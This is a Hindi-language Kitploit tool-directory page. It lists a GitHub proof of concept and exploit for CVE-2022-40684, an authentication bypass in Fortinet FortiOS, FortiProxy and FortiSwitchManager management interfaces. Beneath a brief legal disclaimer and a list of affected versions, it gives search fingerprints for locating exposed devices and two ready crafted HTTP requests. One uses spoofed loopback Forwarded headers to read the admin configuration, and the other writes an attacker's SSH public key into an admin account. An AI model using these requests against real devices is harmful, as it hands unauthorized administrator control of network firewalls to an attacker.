Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-40684 — CVE-2022-40684 के लिए PoC और शोषण, Fortinet FortiOS, FortiProxy और FortiSwitchManager प्रबंधन इंटरफेस में एक प्रमाणीकरण बाईपास, जो तैयार HTTP अनुरोधों के माध्यम से अनधिकृत व्यवस्थापक पहुंच को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/hughink/cve-2022-40684
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhughink/cve-2022-40684

CVE-2022-40684

CVE-2022-40684 के लिए PoC और शोषण, Fortinet FortiOS, FortiProxy और FortiSwitchManager प्रबंधन इंटरफेस में एक प्रमाणीकरण बाईपास, जो तैयार HTTP अनुरोधों के माध्यम से अनधिकृत व्यवस्थापक पहुंच को सक्षम करता है।

रिपॉजिटरी देखें
113243 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-40684

कानून का पालन:

किसी भी व्यक्ति या संगठन को इंटरनेट का उपयोग करते समय संवैधानिक कानूनों का पालन करना चाहिए, सार्वजनिक व्यवस्था का पालन करना चाहिए, सामाजिक नैतिकता का सम्मान करना चाहिए, नेटवर्क सुरक्षा को नुकसान नहीं पहुँचाना चाहिए, और राष्ट्रीय सुरक्षा, सम्मान और हितों को नुकसान पहुँचाने वाली गतिविधियों के लिए इंटरनेट का उपयोग नहीं करना चाहिए।

भेद्यता परिचय:

Fortinet एक वैश्विक स्तर पर प्रसिद्ध नेटवर्क सुरक्षा उत्पाद और सुरक्षा समाधान प्रदाता है, जिसके उत्पादों में फ़ायरवॉल, एंटीवायरस सॉफ़्टवेयर, आक्रमण रोकथाम प्रणाली और एंडपॉइंट सुरक्षा घटक शामिल हैं। प्रभावित FortiOS, FortiProxy और FortiSwitchManager उत्पादों के प्रबंधन इंटरफ़ेस में, वैकल्पिक पथ या चैनलों का उपयोग करके प्रमाणीकरण को दरकिनार किया जा सकता है, और बिना प्रमाणीकरण के विशेष रूप से तैयार HTTP या HTTPS अनुरोधों के माध्यम से प्रबंधन इंटरफ़ेस पर संचालन किया जा सकता है।

जोखिम स्तर : उच्च

प्रभावित संस्करण:

FortiOS संस्करण 7.2.0 - 7.2.1

FortiOS संस्करण 7.0.0 - 7.0.6

FortiProxy संस्करण 7.2.0

FortiProxy संस्करण 7.0.0 - 7.0.6

FortiSwitchManager संस्करण 7.2.0

FortiSwitchManager संस्करण 7.0.0

संपत्ति निर्धारण:

title="FortiProxy“

title="FortiGate"

भेद्यता पुनरुत्पादन:

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

टूल डाउनलोड करें